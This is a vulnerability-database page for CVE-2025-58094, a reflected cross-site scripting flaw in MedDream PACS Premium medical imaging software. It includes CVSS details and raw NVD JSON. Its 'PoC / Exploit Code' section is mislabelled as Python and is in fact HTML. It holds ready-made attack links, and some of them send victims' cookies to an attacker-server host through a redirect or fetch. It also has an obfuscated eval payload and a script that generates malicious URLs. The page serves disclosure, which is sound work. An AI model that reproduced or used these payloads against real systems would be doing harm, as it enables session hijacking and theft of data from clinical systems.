Security Vulnerability Report
中文
CVE-2025-58094 CVSS 6.1 MEDIUM

CVE-2025-58094

Published: 2026-01-20 15:17:05
Last Modified: 2026-01-29 15:11:24

Description

Multiple reflected cross-site scripting (xss) vulnerabilities exist in the config.php functionality of MedDream PACS Premium 7.3.6.870. Specially crafted malicious URLs can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger these vulnerabilities.This vulnerability affects the worklistsrc parameter.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:meddream:pacs_server:7.3.6.870:*:*:*:premium:*:*:* - VULNERABLE
MedDream PACS Premium 7.3.6.870

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-58094 PoC - MedDream PACS Premium Reflected XSS --> <!-- Target: MedDream PACS Premium 7.3.6.870 --> <!-- Parameter: worklistsrc --> <!-- Attack Type: Reflected XSS --> <!DOCTYPE html> <html> <head> <title>CVE-2025-58094 PoC</title> </head> <body> <h1>CVE-2025-58094 - MedDream PACS Premium XSS PoC</h1> <!-- Basic XSS PoC - Cookie Stealing --> <h2>Basic XSS Test</h2> <a href="http://target-server/config.php?worklistsrc=<script>alert('XSS')</script>" target="_blank"> Click to Test Basic XSS </a> <!-- Cookie Theft PoC --> <h2>Cookie Theft PoC</h2> <a href="http://target-server/config.php?worklistsrc=<script>document.location='http://attacker-server/steal.php?cookie='+document.cookie</script>" target="_blank"> Click to Test Cookie Theft </a> <!-- Session Hijacking PoC --> <h2>Session Hijacking PoC</h2> <a href="http://target-server/config.php?worklistsrc=<img src=x onerror='fetch("http://attacker-server/log?data="+btoa(document.cookie))' >" target="_blank"> Click to Test Session Hijacking </a> <!-- DOM-based XSS PoC --> <h2>DOM-based XSS Test</h2> <a href="http://target-server/config.php?worklistsrc=<svg/onload=eval(atob('YWxlcnQoJ1hTUycpOw=='))>" target="_blank"> Click to Test DOM XSS </a> <script> // Auto-generate malicious URLs const baseUrl = 'http://target-server/config.php'; const payloads = [ '<script>alert(document.domain)</script>', '<img src=x onerror=alert(1)>', '<svg onload=alert(1)>', 'javascript:alert(document.cookie)', '<iframe src="javascript:alert(document.cookie)">' ]; console.log('Malicious URL Examples:'); payloads.forEach((payload, index) => { const maliciousUrl = `${baseUrl}?worklistsrc=${encodeURIComponent(payload)}`; console.log(`Payload ${index + 1}: ${maliciousUrl}`); }); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58094", "sourceIdentifier": "[email protected]", "published": "2026-01-20T15:17:05.187", "lastModified": "2026-01-29T15:11:24.180", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple reflected cross-site scripting (xss) vulnerabilities exist in the config.php functionality of MedDream PACS Premium 7.3.6.870. Specially crafted malicious URLs can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger these vulnerabilities.This vulnerability affects the worklistsrc parameter."}, {"lang": "es", "value": "Múltiples vulnerabilidades de cross-site scripting (XSS) reflejadas existen en la funcionalidad de config.PHP de MedDream PACS Premium 7.3.6.870. URLs maliciosas especialmente diseñadas pueden llevar a la ejecución arbitraria de código javascript. Un atacante puede proporcionar una URL diseñada para activar estas vulnerabilidades. Esta vulnerabilidad afecta al parámetro worklistsrc."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:meddream:pacs_server:7.3.6.870:*:*:*:premium:*:*:*", "matchCriteriaId": "0F239E49-18E8-4DE0-B9B8-C220C3BC0C62"}]}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2271", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}